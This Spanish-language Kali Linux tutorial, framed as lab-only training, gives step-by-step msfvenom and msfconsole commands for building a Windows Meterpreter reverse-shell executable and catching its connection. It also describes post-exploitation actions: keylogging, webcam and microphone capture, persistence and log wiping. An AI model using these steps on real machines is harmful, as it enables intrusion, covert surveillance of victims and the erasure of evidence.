Pruebas de Penetración y Auditoría con Kali Linux
Descubre el flujo de trabajo esencial para auditar sistemas en un entorno de laboratorio. Domina los conceptos clave de Kali Linux, la sintaxis de Metasploit y el catálogo de comandos para la inspección y diagnóstico de seguridad.
Aviso Educativo y Entorno Controlado
Esta guía ha sido elaborada estrictamente con fines académicos y de aprendizaje en ciberseguridad. Todo el procedimiento descrito debe ejecutarse únicamente dentro de un laboratorio de pruebas controlado (máquinas virtuales aisladas sin acceso a redes externas). GF Academy promueve la formación ética y responsable del conocimiento técnico.
Conceptos Clave del Entorno
Definiciones esenciales antes de iniciar el procedimiento de auditoría:
Kali Linux es una distribución de Linux creada por Offensive Security, enfocada en la seguridad informática, el hacking ético y las pruebas de penetración. Incluye de forma nativa cientos de herramientas como Nmap, Aircrack-ng, Metasploit o John the Ripper para analizar redes, detectar vulnerabilidades y realizar auditorías de seguridad.
Metasploit es una herramienta para desarrollar y ejecutar exploits contra una máquina remota. MSFConsole ofrece una práctica interfaz todo en uno para casi todas las opciones disponibles en el Framework, incluyendo el lanzamiento de exploits, carga de módulos auxiliares, enumeración y creación de oyentes.
Un exploit es el medio por el cual un atacante o pen tester toma ventaja de una falla en un sistema, una aplicación o un servicio para atacar un sistema de manera que dé lugar a un resultado particular deseado que el desarrollador nunca pretendió.
Un payload es el código que queremos que el sistema ejecute y que se va a seleccionar y entregar por el marco. Por ejemplo, un reverse Shell crea una conexión desde el equipo destino hacia el atacante, mientras que un bind Shell une un símbolo del sistema a un puerto de escucha.
Procedimiento Paso a Paso (Pasos 1 al 12)
Sigue la serie de comandos en orden secuencial. Haz clic en "Copiar" para guardar el comando en el portapapeles:
Paso 1. Abrir terminal en Kali Linux
Abre la consola de línea de comandos en tu entorno de Kali Linux.
Paso 2. Ejecutar comando msfvenom
Inicia la herramienta de generación de payloads y artefactos binarios.
$ msfvenomPaso 3. Verificar la IP local con el comando ifconfig
Identifica la interfaz de red local activa (ej. eth0) y toma nota de tu dirección IP.
$ ifconfigPaso 4. Generar ejecutable con msfvenom
Compila el archivo ejecutable sustituyendo la IP local y el nombre deseado del archivo.
$ msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=(aquí va la ip) LPORT=443 -f exe -o (Nombre del archivo).exePaso 5. Iniciar consola msfconsole
Abre la consola interactiva principal del framework Metasploit.
$ msfconsolePaso 6. Cargar el controlador de escucha
Selecciona el módulo genérico para recibir la conexión entrante.
$ use exploit/multi/handlerPaso 7. Definir el payload correspondiente
Establece el payload que coincide con el archivo generado previamente.
$ set payload windows/meterpreter/reverse_tcpPaso 8. Ingresar la IP local (LHOST)
Asigna tu dirección IP de escucha registrada en el paso 3.
$ set LHOST (Ingresar IP)Paso 9. Ingresar el puerto de escucha (LPORT)
Asigna el puerto de comunicación (ejemplo: 443).
$ set LPORT 443Paso 10. Verificar las opciones configuradas
Despliega el estado de las variables configuradas para confirmar los valores.
$ show optionsPaso 11. Iniciar la escucha del controlador
Inicia el proceso a la espera de la conexión en el puerto definido.
$ exploitPaso 12. Verificación del estado y ejecución de comandos
En este punto el archivo infectado ya está creado, es cuestión de pasar el archivo a la máquina de prueba para iniciar la ejecución.
Comandos de Inspección y Consulta (14 Comandos)
14 ComandosMuestra información detallada del sistema operativo y arquitectura de la máquina de prueba.
Intenta la elevación de privilegios en el sistema.
Muestra la configuración de red y direcciones IP de la máquina de destino.
Captura una imagen del escritorio activo en la máquina.
Inicia la captura de entradas del teclado en memoria.
Muestra en consola las teclas capturadas durante la sesión.
Detiene el proceso de captura del teclado.
Configura la ejecución automática de la tarea al reiniciar el sistema.
Ejecuta un programa o proceso en la máquina de destino.
Abre la consola de comandos de línea (command prompt / cmd) interactiva.
Muestra el listado de cámaras web disponibles en la máquina.
Inicia la transmisión de video de la cámara seleccionada.
Cancela la transmisión activa de video o proceso en consola.
Graba audio del micrófono durante la cantidad de segundos especificada (ej. 10s).
Limpia los registros de eventos e historial de auditoría en la máquina.
¿Cómo Funciona el Laboratorio en Conjunto?
Para comprender la relación entre todos los pasos sin perderse en la sintaxis, el flujo de trabajo de la prueba se divide en 3 fases clave:
Generación del Artefacto
Con msfvenom compilas el ejecutable binario indicando tu IP local (LHOST) y puerto de escucha (LPORT).
Escucha del Controlador
En msfconsole utilizas multi/handler para activar el puerto asignado a la espera de recibir el enlace desde la máquina de prueba.
Consulta e Inspección
Una vez establecida la sesión de prueba, utilizas el catálogo de 14 comandos (sysinfo, ipconfig, screenshot) para examinar el estado del sistema.
Resumen del Laboratorio
4 Conceptos Base
Explicaciones de Kali Linux, MSFConsole, Exploit y Payload.
12 Pasos Secuenciales
Guía de comandos desde abrir la terminal hasta ejecutar la escucha del controlador.
14 Comandos de Inspección
Catálogo de 14 comandos de consulta e inspección integrados en el paso final.